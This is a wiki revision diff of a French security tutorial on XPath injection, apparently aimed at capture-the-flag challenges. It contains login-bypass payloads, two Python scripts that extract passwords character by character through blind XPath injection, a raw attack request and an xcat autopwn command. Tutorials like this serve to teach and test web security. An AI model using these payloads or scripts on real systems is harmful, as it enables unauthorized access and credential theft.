Différences

Cette page vous donne les différences entre la révision choisie et la version actuelle de la page.

--- failles_web:xpath_injection [2014/07/01 13:55]
sorcha créée
+++ failles_web:xpath_injection [2017/04/09 15:33] (Version actuelle)
@@ Ligne 5: / Ligne 5: @@
-Une authentification basée sur un fichier xml.
 ==== Le principe: ====
@@ Ligne 70: / Ligne 69: @@
 Le test login/password se fait sur ce genre de code:
 <code php>
-Error during search, invalid XPath syntax : //user/username[contains(., '' )')]
+Invalid XPath syntax : //user/username[contains(., '' )')]
 </code>
@@ Ligne 83: / Ligne 82: @@
 En deuxième paramètre contains attend un string qu'elle recherchera dans le premier (en l’occurrence . qui correspond au nœud actuel à savoir username),
-* l'injection devra donc commencer par ')
+  * l'injection devra donc commencer par ')
-* On ferme le premier prédicat par ].
+  * On ferme le premier prédicat par ].
-* On doit ensuite gérer la fin de la requête, on doit donc finir par [('1'='1
+  * On doit ensuite gérer la fin de la requête, on doit donc finir par [('1'='1
 L'injection sera donc:
 <code python>
-user=')][('1'='1&pass=
+user=')][('1'='1
 </code>
@@ Ligne 113: / Ligne 112: @@
 L'injection sera finalement:
 <code python>
-username=')]/../*[('1'='1&pass=
+username=')]/../*[('1'='1
 </code>
@@ Ligne 147: / Ligne 146: @@
 \\
-Ce script recherche toutes les valeurs présentes dans les nodes user. Il se contente des champs d'index 4 et 6 car ils correspondent respectivement au id et au pwd. Les champs 2,8 et 10 correspondent à l'index, au type de compte et au mail.
+Ce script recherche toutes les valeurs présentes dans les nodes user. Il se contente des champs d'index 1 et 2 car ils correspondent respectivement au id et au pwd. Les champs 3,8 et 10 correspondent à l'index, au type de compte et au mail.
 La condition pour savoir si la requête renvoie True est 'Bob' car on a laissé userid=2 dans la partie fixe de l'injection.
 <code python>
+...
 if "Bob" in res.text
 ...
@@ Ligne 158: / Ligne 158: @@
 <file python xpath3.py>
 import requests
+page = "http:///?action=user&userid=2"
+cooki = {'che' : '1','spip_session' : ''}
 child_node_pos=0
@@ Ligne 164: / Ligne 169: @@
 for user in range(1,10):
-print "user:"+str(user)
+        print "user:"+str(user)
-passwd=""
+        passwd=""
-for child_node_pos in (4,6):
+        for child_node_pos in (4,6):
-print " - noeud:"+str(child_node_pos)
+                print " - noeud:"+str(child_node_pos)
-for t in range(1,50):
+                for t in range(1,50):
-if continuer:
+                        if continuer:
-continuer=False
+                                continuer=False
-for carac in charset:
+                                for carac in charset:
-req=page+"+and+substring(//user["+str(user)+"]/child::node()["+str(child_node_pos)+"],"+str(t)+",1)=codepoints-to-string("+str(ord(carac))+")"
+                                        req=page+"+and+substring(//user["+str(user)+"]/child::node()["+str(child_node_pos)+"],"+str(t)+",1)=codepoints-to-string("+str(ord(carac))+")"
-res = requests.get(req,cookies=cooki)
+                                        res = requests.get(req,cookies=cooki)
-if "Bob" in res.text:
+                                        if "John" in res.text:
-passwd+=carac
+                                                passwd+=carac
-continuer=True
+                                                continuer=True
-print passwd
+                                                print passwd
-break
+                                                break
-else:
+                        else:
-print passwd
+                                print passwd
-t=1
+                                t=1
-continuer=True
+                                continuer=True
-passwd+=":"
+                                passwd+=":"
-break
+                                break
 </file>
 \\
@@ Ligne 207: / Ligne 211: @@
 string-length(//user[position()=1]/child::node()[position()=6])=10
 </code>
-* Vérifie la longueur du password du user John:
+* Vérifie la longueur du password du user Alice:
 <code python>
-string-length(//user['john']/password)=10
+string-length(//user['Alice']/password)=10
 </code>
@@ Ligne 224: / Ligne 228: @@
 </code>
-Dans l'exemple d'Alice et ses amis, on obtiendrait un seul résult:Harry qui a un mdp de plus de 12 caractères.
+Dans l'exemple d'Alice et ses amis, on obtiendrait un seul résult:Potter qui a un mdp de plus de 12 caractères.
 * Par extension, pour lister les usernames (parmi les quelques dizaines de façons différentes):
@@ Ligne 290: / Ligne 294: @@
 codepoints-to-string(90,101,110,107) renverra 'Zenk'
 </code>
-Dans l'exemple du chall n°3, la requête renverra True si le node d'index 4 du user d'index 2 commence par carac:
+La requête renverra True si le node d'index 4 du user d'index 2 commence par carac:
 <code python>
 req=page+"+and+substring(//user[2]/child::node()[4],1,1)=codepoints-to-string(string(ord(carac)))
@@ Ligne 311: / Ligne 315: @@
 #!/usr/bin/python
 import requests
 page =
 cooki = {}
 charset = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
 passwd=""
 req=page+"')][('1'='1"
 res = requests.get(req,cookies=cooki)
 for x in res.text.split("<li>"):print x
 continuer=True
 for t in range(0,50):
-if continuer:
+	if continuer:
-continuer=False
+		continuer=False
-for carac in charset:
+		for carac in charset:
-req=page+"Alice') and starts-with(../password,'"+passwd+carac
+			req=page+"Alice') and starts-with(../password,'"+passwd+carac
-#print req
+			#print req
-res = requests.get(req,cookies=cooki)
+			res = requests.get(req,cookies=cooki)
-#print " rep= "+res.text.split("value=")[3]+"\n-----------\n"
+			#print " rep= "+res.text.split("value=")[3]+"\n-----------\n"
-if "1 result" in res.text:
+			if "1 résultat trouvé" in res.text:
-passwd+=carac
+				passwd+=carac
-continuer=True
+				continuer=True
-print passwd
+				print passwd
-break
+				break
-else:
+	else:
-print "Le mot de passe est : "+passwd
+		print "Le mot de passe est : "+passwd
-break
+		break
 </file>
@@ Ligne 348: / Ligne 351: @@
 La requête RAW:
 <code python>
-GET HTTP/1.1
+GET //url.com/log=members&search=Harry')+and+starts-with(../password,' HTTP/1.1
 Host:
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0
@@ Ligne 386: / Ligne 389: @@
 à tester:
 <code python>
-xcat.py --true "John" --arg "action=user&userid=2" --method GET --cookie "" http://challenge01.root-me.org//web-serveur/ch24/? --autopwn
+xcat.py --true "Alice" --arg "do=user&id_user=2" --method GET --cookie "" http://url.com/? --autopwn
 </code>
@@ Ligne 393: / Ligne 396: @@
 Le meilleur pour la fin, l'excellent outil de Krach:
-[[http://krach.in/category/outils/page/4/]]
+[[http://krach.me/XPath_Injection_Utility/]]
 \\
 ==== xpath-blind-explorer====
 [[http://code.google.com/p/xpath-blind-explorer/downloads/list?]]
-===== Docs =====
 ----
-* [[http://media.blackhat.com/bh-eu-12/Siddharth/bh-eu-12-Siddharth-Xpath-WP.pdf]]
-* [[http://2stop.me/Sécurité%20Informatique/Web/EN%20-%20Blind%20Xpath%20injection.pdf]]
+===== Docs =====
-* [[http://packetstorm.interhost.co.il/papers/bypass/Blind_XPath_Injection_20040518.pdf]]
+  * [[http://media.blackhat.com/bh-eu-12/Siddharth/bh-eu-12-Siddharth-Xpath-WP.pdf]]
+  * [[http://2stop.me/Sécurité%20Informatique/Web/EN%20-%20Blind%20Xpath%20injection.pdf]]
+  * [[http://packetstorm.interhost.co.il/papers/bypass/Blind_XPath_Injection_20040518.pdf]]

Zenk - Security

Outils d'utilisateurs

Outils du Site

Différences

Outils de la Page